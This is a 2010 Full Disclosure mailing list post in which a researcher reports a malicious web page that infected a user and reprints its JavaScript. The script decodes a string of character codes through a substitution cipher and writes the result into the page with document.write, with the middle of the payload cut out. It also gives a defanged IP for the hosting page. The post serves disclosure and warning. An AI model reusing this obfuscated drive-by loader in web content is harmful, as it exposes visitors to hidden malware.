Full Disclosure mailing list archives
Some nice code just captured
From: Stephan Gerling <SGerling () RosenInspection net>
Date: Mon, 22 Feb 2010 15:12:26 +0100
Dear all,
I just received information from a scared user about something strange on his computer. I investigated and found this script.
----------------------from the index.html-------------------------------
#alert { z-index:1300; width:434px; height:332px; position:absolute; display:none; cursor:hand; background:url(/res/1/1/images/alert.gif); } </style> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title></title> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script> <script type="text/javascript"> var y2c2a2ff = ["s","x","Z","f","B","U","X","J","W","N","c","C","O","G","T","I","P","S","D","h","F","k","Q","y","u","w","b","r","o","j","q","l","m","t","z","A","E","i","M","L","p","n","g","Y","e","V","R","v","H","a","d","K"], z2c2a2ff = 9; var dl_d7e9ccb94 = 'd_d7e9cc.jpg'; var cc = 1, ee = 1; (function() { dl_d7e9ccb94 = dl_d7e9ccb94.replace(/\.jpg/, '.php'); var temp="",i,pass2 = "",sou=""; var x2c2a = "60)^$,78)^$,104)^$,69)^$,82)^$,97)^$,103)^$,32)^$,103)^$,10
-----cut off------ (the omitted values seem to be ASCII codes) -------cut off------
Continuation of the script:
78)^$,104)^$,69)^$,82)^$,97)^$,103)^$,62)^$,"; temp = x2c2a.split(")^$,"); for (var i in temp) { pass2 += String.fromCharCode(temp[i]); } pass2 = pass2.replace(/\&/g,'&'); pass2 = pass2.replace(/\</g,'<'); pass2 = pass2.replace(/\>/g,'>'); pass2 = pass2.replace(/\"/g,'"'); var pass1 = ""; temp = pass2.split(""); for (var i in temp) { sou += f2c2a2ff7f(temp[i]); } document.write(sou); })(); function f2c2a2ff7f(s_in){ var index = $.inArray(s_in, y2c2a2ff); if(index >= 0){ var new_index = (index - z2c2a2ff) < 0 ? 
y2c2a2ff.length - (z2c2a2ff - index) : index - z2c2a2ff; return y2c2a2ff[new_index]; } return s_in; } </script> <script type="text/javascript"> (function($) { if ($.browser.mozilla) { $.fn.disableTextSelect = function() { return this.each(function() { $(this).css({ 'MozUserSelect' : 'none' }); }); }; $.fn.enableTextSelect = function() { return this.each(function() { $(this).css({ 'MozUserSelect' : '' }); }); }; } else if ($.browser.msie) { $.fn.disableTextSelect = function() { return this.each(function() { $(this).bind('selectstart.disableTextSelect', function() { return false; }); }); }; $.fn.enableTextSelect = function() { return this.each(function() { $(this).unbind('selectstart.disableTextSelect'); }); }; } else { $.fn.disableTextSelect = function() { return this.each(function() { $(this).bind('mousedown.disableTextSelect', function() { return false; }); }); }; $.fn.enableTextSelect = function() { return this.each(function() { $(this).unbind('mousedown.disableTextSelect'); }); }; } })(jQuery); </script> </head> <body> </body> </html>
If you open this web page (http : / / 217.23.5.205 / index.ht......), you will be infected with Virus/Malware: Cryp_Krap-9.
Best regards, Stephan Gerling
May the force be with you ------------------------- Obi-Wan
_______________________________________________
Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/